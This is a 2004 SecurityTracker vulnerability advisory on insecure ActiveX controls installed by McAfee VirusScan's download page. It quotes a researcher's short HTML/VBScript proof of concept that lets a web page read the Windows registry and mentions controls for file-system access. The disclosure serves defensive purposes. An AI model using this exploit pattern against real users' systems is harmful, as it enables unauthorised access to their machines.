SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Security)  >  VirusScan Vendors:  McAfee
McAfee VirusScan ActiveX Controls Let Remote Users Access the Target User's System
SecurityTracker Alert ID:  1009956
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 27 2004
Impact:  User access via network
Exploit Included:  Yes  
Description:  A vulnerability was reported in McAfee VirusScan. A remote user may be able to access a target user's system.

Jonathan Payne reported that the software appears to install several non-secure ActiveX controls. A remote user can reportedly create HTML that, when loaded by the target user, will invoke the ActiveX controls and access the target user's system.

A demonstration exploit that accesses the target user's Windows registry is provided in the Source Message.
Impact:  A remote user can create HTML that, when loaded by the target user, will be able to access the target user's system.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.mcafee.com/ (Links to External Site)
Cause:  Access control error
Underlying OS:  Windows (Any)
Reported By:  Jonathan Payne <jpayne@DSL.PIPEX.COM>
Message History:   None.

 Source Message Contents
Date:  Sun, 25 Apr 2004 08:17:25 +0100
From:  Jonathan Payne <jpayne@DSL.PIPEX.COM>
Subject:  McAfee VirusScan installer uses insecure ActiveX controls

 

After installing the McAfree VirusScan, it appears that it is possible for
any web page to access the Windows regisry with the following HTML:

<html>
 <object classid="clsid:4C29D864-C55A-46DD-865C-17A1B7CC1A1A" id="gobjReg"
style="display: none;">
 </object>
 <h1>McAfee installer test</h1>
 <script language="vbscript">
  document.write( _
   gobjReg.RegQueryValue( "HKCU\Control Panel\Desktop", "Wallpaper") _
  )
 </script>
</html>

(when viewed in IE 6 with default secutiry and with VirusScan installed,
this HTML displays the location of the current Windows desktop bitmap)

You can see this behaviour by selecting the 15-Day Free trial of McAfee
Virus scan from this page:
   http://download.mcafee.com/us/eval/evaluate2.asp?cid=9445
Then going through the account creation process and then clicking on the
download link.

The download page (the one with the "Start" button) appears to install a
number of ActiveX controls which are not secured in any way.  As well as the
registry one, there are controls for acessing the file system and for
configuring the operating system.

I have uploaded a full copy if the IDL for the installer objects here:
   http://www.aslg21.dsl.pipex.com/test/McAfeeIDL.txt
There appear to be lots more fun interfaces that I haven't tested yet.

Jonathan Payne

-----
Earn up to 10 credit course hours toward the TruSecure ICSA Practitioner (TICSA) Credential and recei
ve a TICSA exam coupon by attending
 the Infosecurity Canada 2004 conference.  Featured speaker, Marcus J. Ranum, TruSecure inventor of t
he proxy firewall will present
 on June 3 at 11:30 AM.  Visit <https://ticsa.trusecure.com>  for certification details and <
http://www.infosecuritycanada.com>  for
 conference information.  Become TICSA certified and see what happens!
-----


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC